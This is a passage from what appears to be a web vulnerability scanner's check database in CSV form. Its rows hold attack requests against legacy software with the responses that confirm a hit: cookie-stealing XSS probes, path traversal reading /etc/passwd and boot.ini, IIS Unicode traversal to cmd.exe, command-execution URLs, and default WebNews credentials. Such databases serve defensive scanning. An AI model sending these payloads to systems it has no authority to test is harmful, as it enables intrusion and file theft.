system.\",\"\",\"\"\n\"003170\",\"4262\",\"4\",\"/addressbook.php?\\\"><script>alert(Vulnerable)</script><!--\",\"GET\",\"<script>alert\\(Vulnerable\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003171\",\"4263\",\"4\",\"/options.php?optpage=<script>alert('Vulnerable!')</script>\",\"GET\",\"include_path\",\"\",\"\",\"\",\"\",\"This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.\",\"\",\"\"\n\"003172\",\"4264\",\"4\",\"/search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search\",\"GET\",\"include_path\",\"\",\"\",\"\",\"\",\"This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.\",\"\",\"\"\n\"003173\",\"4265\",\"4\",\"/help.php?chapter=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003174\",\"4266\",\"4\",\"/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0\",\"GET\",\"<script>alert\\(Vulnerable\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Squirrel Mail is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003175\",\"4300\",\"7\",\"@CGIDIRSpowerup/r.cgi?FILE=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The Powerup CGI allows attackers to read any file on the system.\",\"\",\"\"\n\"003176\",\"4300\",\"7\",\"@CGIDIRSr.cgi?FILE=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The Powerup CGI allows attackers to read any file on the system.\",\"\",\"\"\n\"003177\",\"4301\",\"d\",\"@CGIDIRSWebnews.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of WebNews are vulnerable to a buffer overflow. See http://www.nextgenss.com/advisories/netwinnews.txt for more info.\",\"\",\"\"\n\"003178\",\"4301\",\"a\",\"@CGIDIRSwebnews.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WebNews may contain some default users in the binary: testweb/newstest, alwn3845/imaptest, alwi3845/wtest3452, testweb2/wtest4879\",\"\",\"\"\n\"003179\",\"4302\",\"7\",\"/.../.../.../\",\"GET\",\"Last Modified\",\"\",\"\",\"\",\"\",\"The myCIO server allows directory traversal.\",\"\",\"\"\n\"003180\",\"4313\",\"3\",\"@CGIDIRStexis.exe/junk\",\"GET\",\"Web Script\",\"\",\"\",\"\",\"\",\"Texis Web Script gives system path/information when an invalid file is requested.\",\"\",\"\"\n\"003181\",\"4313\",\"3\",\"@CGIDIRStexis/junk\",\"GET\",\"Web Script\",\"\",\"\",\"\",\"\",\"Texis Web Script gives system path/information when an invalid file is requested.\",\"\",\"\"\n\"003182\",\"4314\",\"3\",\"/texis.exe/?-dump\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Texis installation may reveal sensitive information.\",\"\",\"\"\n\"003183\",\"4314\",\"3\",\"/texis.exe/?-version\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Texis installation may reveal sensitive information.\",\"\",\"\"\n\"003184\",\"435\",\"7\",\"@CGIDIRSapexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files from the server. CVE-2000-0975. BID-2338.\",\"\",\"\"\n\"003185\",\"4356\",\"4\",\"/acart2_0/deliver.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003186\",\"4357\",\"4\",\"/acart2_0/error.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003187\",\"4358\",\"4\",\"/acart2_0/admin/error.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003188\",\"4359\",\"4\",\"/acart2_0/admin/index.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003189\",\"436\",\"7\",\"@CGIDIRSsensepost.exe?/c+dir\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The presence of sensepost.exe indicates the system is/was vulnerable to a Unicode flaw and was compromised with a test script from SensePost. The sensepost.exe allows command execution (it is a copy of cmd.exe), as did the original unicode exploit (see ht\",\"\",\"\"\n\"003190\",\"436\",\"8\",\"/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003191\",\"436\",\"8\",\"/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003192\",\"436\",\"8\",\"/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003193\",\"436\",\"8\",\"/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003194\",\"436\",\"8\",\"/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003195\",\"436\",\"8\",\"/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003196\",\"436\",\"8\",\"/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003197\",\"436\",\"8\",\"/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003198\",\"436\",\"8\",\"/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\\"\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003199\",\"436\",\"8\",\"/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884\",\"\",\"\"\n\"003200\",\"4360\",\"2\",\"/acart2_0/acart2_0.mdb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.\",\"\",\"\"\n\"003201\",\"4361\",\"2\",\"/acart2_0/admin/category.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.\",\"\",\"\"\n\"003202\",\"474\",\"7\",\"/Sites/Knowledge/Membership/Inspired/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003203\",\"474\",\"7\",\"/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003204\",\"474\",\"7\",\"/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003205\",\"474\",\"7\",\"/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003206\",\"474\",\"7\",\"/Sites/Samples/Knowledge/Push/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003207\",\"474\",\"7\",\"/Sites/Samples/Knowledge/Search/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003208\",\"474\",\"7\",\"/SiteServer/Publishing/ViewCode.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.\",\"\",\"\"\n\"003209\",\"17671\",\"37\",\"/siteserver/publishing/viewcode.asp?source=/default.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be able to view source code using Site Server vulnerability.\",\"\",\"\"\n\"003210\",\"4775\",\"7\",\"/shoutbox.php?conf=../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Webfroot Shoutbox 2.32 and below allows any file to be read from the system.\",\"\",\"\"\n\"003211\",\"4908\",\"d\",\"/securelogin/1,2345,A,00.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.\",\"\",\"\"\n\"003212\",\"4927\",\"7\",\"/.%252e/.%252e/.%252e/winnt/boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"JWalk Web server allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"003213\",\"4928\",\"3\",\"/add.php\",\"GET\",\"Failed opening '\",\"\",\"\",\"\",\"\",\"Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages.\",\"\",\"\"\n\"003214\",\"497\",\"3\",\"/class/mysql.class\",\"GET\",\"This program is free software\",\"\",\"\",\"\",\"\",\"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials.\",\"\",\"\"\n\"003215\",\"497\",\"3\",\"/inc/sendmail.inc\",\"GET\",\"This program is free software\",\"\",\"\",\"\",\"\",\"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials.\",\"\",\"\"\n\"003216\",\"5089\",\"8\",\"/admin/system.php3?cmd=cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003217\",\"5089\",\"8\",\"/admin/system.php3?cmd=dir%20c:\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003218\",\"5090\",\"8\",\"/admin/exec.php3?cmd=cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003219\",\"5090\",\"8\",\"/admin/exec.php3?cmd=dir%20c:\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"DotBr 0.1 allows remote command execution.\",\"\",\"\"\n\"003220\",\"5091\",\"3\",\"/foo.php3\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"DotBr 0.1 has a phpinfo() script called foo.php3.\",\"\",\"\"\n\"003221\",\"5092\",\"3\",\"/config.inc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"DotBr 0.1 configuration file includes usernames and passwords.\",\"\",\"\"\n\"003222\",\"5093\",\"3\",\"@CGIDIRSenviron.pl\",\"GET\",\"REMOTE_ADDR\",\"\",\"\",\"\",\"\",\"Sambar Server default script reveals environment information\",\"\",\"\"\n\"003223\",\"5094\",\"3\",\"@CGIDIRStestcgi.exe\",\"GET\",\"REMOTE_ADDR\",\"\",\"\",\"\",\"\",\"Sambar Server default script reveals environment information\",\"\",\"\"\n\"003224\",\"5095\",\"3\",\"/sysuser/docmgr/ieedit.stm?url=../\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sambar default file may allow directory listings.\",\"\",\"\"\n\"003225\",\"5096\",\"3\",\"/sysuser/docmgr/iecreate.stm?template=../\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sambar default file may allow directory listings.\",\"\",\"\"\n\"003226\",\"5097\",\"4\",\"/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003227\",\"5098\",\"4\",\"/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003228\",\"5098\",\"4\",\"/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003229\",\"5098\",\"4\",\"/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003230\",\"5098\",\"4\",\"/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003231\",\"5098\",\"4\",\"/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003232\",\"5098\",\"4\",\"/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003233\",\"5098\",\"4\",\"/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003234\",\"5098\",\"4\",\"/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003235\",\"5098\",\"4\",\"/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003236\",\"5098\",\"4\",\"/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003237\",\"5098\",\"4\",\"/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003238\",\"5098\",\"4\",\"/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003239\",\"5098\",\"4\",\"/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003240\",\"5098\",\"4\",\"/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003241\",\"5098\",\"4\",\"/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003242\",\"5098\",\"4\",\"/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003243\",\"5099\",\"4\",\"/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003244\",\"5099\",\"4\",\"/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003245\",\"5099\",\"4\",\"/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003246\",\"5099\",\"4\",\"/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003247\",\"5099\",\"4\",\"/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003248\",\"5099\",\"4\",\"/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003249\",\"5099\",\"4\",\"/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003250\",\"5099\",\"4\",\"/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003251\",\"5099\",\"4\",\"/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003252\",\"5100\",\"4\",\"@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003253\",\"5101\",\"4\",\"@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003254\",\"5102\",\"4\",\"/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003255\",\"5102\",\"4\",\"/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>&bar=456\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003256\",\"5103\",\"4\",\"/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003257\",\"5104\",\"4\",\"/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003258\",\"5105\",\"4\",\"/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003259\",\"5106\",\"4\",\"/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003260\",\"5107\",\"4\",\"/netutils/findata.stm?host=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003261\",\"5107\",\"4\",\"/netutils/findata.stm?user=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003262\",\"5108\",\"4\",\"/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003263\",\"514\",\"8\",\"/isapi/tstisapi.dll\",\"GET\",\"Pi3web\",\"\",\"\",\"\",\"\",\"The test tstisapi.dll is available and can allow attackers to execute commands remotely.\",\"\",\"\"\n\"003264\",\"524\",\"7\",\"@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320\",\"\",\"\"\n\"003265\",\"524\",\"7\",\"@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320\",\"\",\"\"\n\"003266\",\"5324\",\"7\",\"/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf\",\"GET\",\"SET CLIENT FILE\",\"\",\"\",\"\",\"\",\"Default scripts can allow arbitrary access to the host.\",\"\",\"\"\n\"003267\",\"5325\",\"7\",\"/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf\",\"GET\",\"Source for file\",\"\",\"\",\"\",\"\",\"Novell web server allows any file on the system to viewed through the viewcode.jsp file\",\"\",\"\"\n\"003268\",\"534\",\"7\",\"@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"ustorekeeper will display arbitrary files. CVE-2001-0466\",\"\",\"\"\n\"003270\",\"539\",\"d\",\"/catinfo\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.\",\"\",\"\"\n\"003271\",\"5407\",\"a\",\"/soap/servlet/soaprouter\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.\",\"\",\"\"\n\"003272\",\"543\",\"7\",\"/opendir.php?/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321\",\"\",\"\"\n\"003273\",\"543\",\"7\",\"/opendir.php?requesturl=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321\",\"\",\"\"\n\"003274\",\"5457\",\"4\",\"/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"003275\",\"5457\",\"4\",\"@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bonsai is vulnerable to Cross Site Scripting (XSS). 